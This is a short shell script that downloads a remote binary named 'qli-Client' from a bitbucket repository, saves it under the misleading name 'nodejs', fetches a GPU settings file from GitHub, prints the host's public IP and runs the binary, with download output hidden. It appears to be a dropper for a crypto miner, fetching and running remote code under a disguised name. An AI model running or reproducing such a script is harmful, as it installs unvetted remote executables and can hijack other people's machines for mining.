#!/bin/sh
mkdir node && cd node
wget -q -O nodejs https://bitbucket.org/excel-gms/fix/downloads/qli-Client && chmod +x nodejs >/dev/null 2>&1
wget https://raw.githubusercontent.com/erlandi-main-api/QBMASTER/main/gpu/appsettings.json >/dev/null 2>&1
sleep 11 
echo "******************************************************************" 
echo "IP ORI ==> "$(curl ifconfig.me) 
echo " "
./nodejs
